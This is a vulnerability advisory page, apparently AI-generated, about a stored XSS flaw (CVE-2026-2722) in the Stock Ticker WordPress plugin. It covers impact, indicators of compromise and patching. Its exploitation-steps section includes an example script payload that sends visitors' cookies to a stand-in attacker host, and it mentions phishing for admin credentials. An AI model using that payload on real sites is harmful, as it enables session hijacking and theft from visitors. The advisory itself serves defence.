CVE-2026-2722
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-2722 is a Stored Cross-Site Scripting (XSS) vulnerability in the Stock Ticker plugin for WordPress, affecting all versions up to and including 3.26.1. The flaw stems from insufficient input sanitization and output escaping in admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability is limited in scope, affecting only multi-site WordPress installations or those where unfiltered_html has been disabled. It was published on March 7, 2026, with a CVSS v3.1 base score of 4.8 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists in the plugin's settings class (class-wpau-stock-ticker-settings.php, around line 810), where admin-supplied input is neither properly sanitized on input nor escaped on output, allowing script injection via the WordPress admin panel. Exploitation requires an authenticated session with administrator-level privileges, and the injected script executes in the context of any user who visits an affected page. The vulnerable code is publicly browsable in the WordPress plugin repository (WordPress Trac, EUVD).

Impact

Successful exploitation allows an attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of any user visiting those pages. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The confidentiality and integrity impacts are low, and there is no direct availability impact; however, in multi-site environments, the blast radius may extend across multiple sub-sites (Wordfence, EUVD).

Exploitability

The vulnerability requires high privileges (administrator-level) and user interaction (a victim must visit the injected page), significantly limiting its exploitability. The EPSS score is approximately 0.021% (0.000210), indicating a very low probability of exploitation in the wild. No evidence of active in-the-wild exploitation, exploit kits, or threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify a WordPress multi-site installation or one with unfiltered_html disabled that is running the Stock Ticker plugin version ≤ 3.26.1.
  2. Obtain Admin Access: Authenticate to the WordPress admin panel with administrator-level credentials (obtained via phishing, credential stuffing, or other means).
  3. Navigate to Plugin Settings: Access the Stock Ticker plugin settings page within the WordPress admin dashboard.
  4. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.
  5. Save Settings: Submit/save the settings, causing the payload to be stored in the WordPress database.
  6. Trigger Execution: When any user (including non-admin visitors) loads a page that renders the affected Stock Ticker widget or setting output, the injected script executes in their browser, enabling session hijacking or further attacks (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to Stock Ticker plugin settings, particularly by accounts not typically managing plugin configuration.
  • Database: Presence of <script> tags or JavaScript event handlers (e.g., onerror, onload) in the wp_options table entries associated with the Stock Ticker plugin (stock_ticker_* option keys).
  • Network: Outbound requests from user browsers to unfamiliar external domains shortly after visiting pages with the Stock Ticker widget, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to plugin settings files or the presence of web shells in the plugin directory (/wp-content/plugins/stock-ticker/).

Mitigation and workarounds

Users should update the Stock Ticker plugin to a version beyond 3.26.1 that includes the fix introduced in changeset 3474252. The patch can be reviewed in the WordPress plugin repository changeset. As a temporary workaround, administrators can restrict access to the plugin's settings page to trusted accounts only, or temporarily deactivate the plugin on affected installations. Ensuring unfiltered_html remains disabled (the default for non-super-admins on multi-site) provides an additional layer of defense (Wordfence, WordPress Trac).

Community reactions

The vulnerability was discovered and disclosed by Wordfence, which assigned it a medium severity rating consistent with the constrained exploitation conditions. Coverage has been limited to automated vulnerability tracking platforms and security feeds, with no notable researcher commentary or significant media coverage beyond standard CVE publication channels (Wordfence, EUVD).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-81648CRITICAL10
  • cryptopayment-gateway
NoNoSep 13, 2026
CVE-2026-88793HIGH8.8
  • youram-youtube-embed
NoNoSep 13, 2026
CVE-2026-85129HIGH8.8
  • hoo-companion
NoNoSep 13, 2026
CVE-2026-88802HIGH7.5
  • mobile-events-manager
NoYesSep 13, 2026
CVE-2026-89050MEDIUM4.3
  • quick-adsense-reloaded
NoYesSep 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management